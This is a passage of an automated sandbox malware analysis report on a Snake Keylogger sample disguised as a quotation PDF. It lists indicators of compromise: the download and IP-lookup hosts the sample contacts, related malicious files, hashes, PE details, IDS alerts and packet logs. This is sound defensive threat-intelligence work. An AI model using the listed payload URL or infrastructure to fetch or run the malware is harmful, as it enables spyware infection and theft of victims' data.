                                            http://reallyfreegeoip.orgaspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.orgaspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DE4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgaspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.comaspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://s24.filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://reallyfreegeoip.org/xml/aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              188.114.97.3
                                                              		s24.filetransfer.ioEuropean Union
                                                              		13335CLOUDFLARENETUSfalse
                                                              193.122.6.168
                                                              		checkip.dyndns.comUnited States
                                                              		31898ORACLE-BMC-31898USfalse
                                                              188.114.96.3
                                                              		filetransfer.ioEuropean Union
                                                              		13335CLOUDFLARENETUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1559133
                                                              Start date and time:2024-11-20 08:17:13 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 27s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:7
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@4/0@4/3
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 71%
                                                              • Number of executed functions: 113
                                                              • Number of non-executed functions: 1
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: QUOTATION_NOVQTRA071244PDF.scr.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              02:18:08API Interceptor13060x Sleep call for process: QUOTATION_NOVQTRA071244PDF.scr.exe modified
                                                              02:19:00API Interceptor65922x Sleep call for process: aspnet_compiler.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              188.114.97.3Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                              • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                              • paste.ee/d/lxvbq
                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                              • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                              • www.ssrnoremt-rise.sbs/3jsc/
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • filetransfer.io/data-package/zWkbOqX7/download
                                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                              • kklk16.bsyo45ksda.top/favicon.ico
                                                              gusetup.exeGet hashmaliciousUnknownBrowse
                                                              • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                              Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                              • gmtagency.online/api/check
                                                              View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                              • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                              SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                              • paste.ee/d/YU1NN
                                                              193.122.6.168QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                              • checkip.dyndns.org/
                                                              DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • checkip.dyndns.org/
                                                              RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • checkip.dyndns.org/
                                                              Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                              • checkip.dyndns.org/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              reallyfreegeoip.orge-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.96.3
                                                              rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.96.3
                                                              INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.96.3
                                                              Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              s24.filetransfer.ioQUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.200.96
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ORACLE-BMC-31898USe-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 193.122.130.0
                                                              Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Company catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 158.101.44.242
                                                              Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 158.101.44.242
                                                              Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 158.101.44.242
                                                              nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 158.101.44.242
                                                              owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 129.146.156.151
                                                              P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 193.122.130.0
                                                              PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              CLOUDFLARENETUSDelivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Delivery_Notification_00000875664.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              MyInstaller_PDFGear.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.1.29
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 188.114.96.3
                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 104.21.91.199
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              CLOUDFLARENETUSDelivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Delivery_Notification_00000875664.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              MyInstaller_PDFGear.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.1.29
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 188.114.96.3
                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 104.21.91.199
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              54328bd36c14bd82ddaa0c04b25ed9ade-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              Benefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              Kayla Dennis CV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              quote001.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/previewGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              • 188.114.96.3

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              No created / dropped files found

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):2.4218683729357977
                                                              TrID:
                                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                              • Win64 Executable GUI (202006/5) 46.43%
                                                              • Win64 Executable (generic) (12005/4) 2.76%
                                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                                              • DOS Executable Generic (2002/1) 0.46%
                                                              File name:QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              File size:339'456 bytes
                                                              MD5:5287698c5838c217c8330670920d1f22
                                                              SHA1:61d94cd397d56e87a13207f680f88fdf829eef71
                                                              SHA256:852c78744e828250542bb9ddf2d7f2797c5613d2ab69cbd0faff944469d2c03b
                                                              SHA512:4a2a295344a3842c9913e7fc0050b53cbb2733fd91019136212f9094351daf4bdac9ad3bdd989b19fbb186bd21404153ac96847269b1b988b70aa9a60f7d9d19
                                                              SSDEEP:768:gl7ult3Qg2ZzEjss2VSg1I1cn0sspAgpq8hLyg1uMN0+dzsRs+eEH:+uLQ7qPpqOLy0uyL+fH
                                                              TLSH:E574DA5A7A74A132ED00CA3419F69E15D2DBEE6C2BE0551D24C8F66D1B322FE8F079C1
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M<g.........."...................... ....@...... .......................`............`...@......@............... .....

                                                              File Icon

                                                              Icon Hash:0e3333b0bbb3b035

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x400000
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x673C4D99 [Tue Nov 19 08:34:33 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:

                                                              Entrypoint Preview

                                                              Instruction
                                                              dec ebp
                                                              pop edx
                                                              nop
                                                              add byte ptr [ebx], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax+eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x51a36.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xf640x1000b20118d8703552eebb902f8468080055False0.580810546875data5.475520620642078IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x40000x51a360x51c0071d627b1a12a8b73f219ba4d9e2e6024False0.071220374617737data2.3495579104603954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x43700x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                                                              RT_ICON0x44980x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                                                              RT_ICON0x48000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                                                              RT_ICON0x4c680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                                                              RT_ICON0x4f500xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                                                              RT_ICON0x5bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                                                              RT_ICON0x6ca00x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                                                              RT_ICON0x73080x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                                                              RT_ICON0x8fb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                                                              RT_ICON0xb5580xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                                                              RT_ICON0xbfc00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                                                              RT_ICON0xf1e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                                                              RT_ICON0x134100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                                                              RT_GROUP_ICON0x554380xbcdata0.5797872340425532
                                                              RT_VERSION0x554f40x358data0.4158878504672897
                                                              RT_MANIFEST0x5584c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-20T08:19:00.694601+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.6.16880TCP
                                                              2024-11-20T08:19:01.944617+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.6.16880TCP
                                                              2024-11-20T08:19:02.546000+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449741188.114.97.3443TCP
                                                              2024-11-20T08:19:03.257175+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.6.16880TCP
                                                              2024-11-20T08:19:03.803744+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744188.114.97.3443TCP
                                                              2024-11-20T08:19:04.632112+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745193.122.6.16880TCP
                                                              2024-11-20T08:19:05.913370+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449758193.122.6.16880TCP
                                                              2024-11-20T08:19:07.194701+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449765193.122.6.16880TCP
                                                              2024-11-20T08:19:08.444614+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449775193.122.6.16880TCP
                                                              2024-11-20T08:19:09.913364+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449781193.122.6.16880TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 20, 2024 08:18:10.176616907 CET4973080192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.181931019 CET8049730188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:10.182008982 CET4973080192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.185219049 CET4973080192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.190500021 CET8049730188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:10.839596987 CET8049730188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:10.848275900 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.848325014 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:10.848445892 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.870280027 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:10.870309114 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:10.882021904 CET4973080192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:11.332837105 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:11.333009958 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:11.439399004 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:11.439434052 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:11.439801931 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:11.491405964 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:11.868544102 CET49731443192.168.2.4188.114.96.3
                                                              Nov 20, 2024 08:18:11.915328979 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:12.405677080 CET44349731188.114.96.3192.168.2.4
                                                              Nov 20, 2024 08:18:12.405788898 CET44349731188.114.96.3192.168.2.4
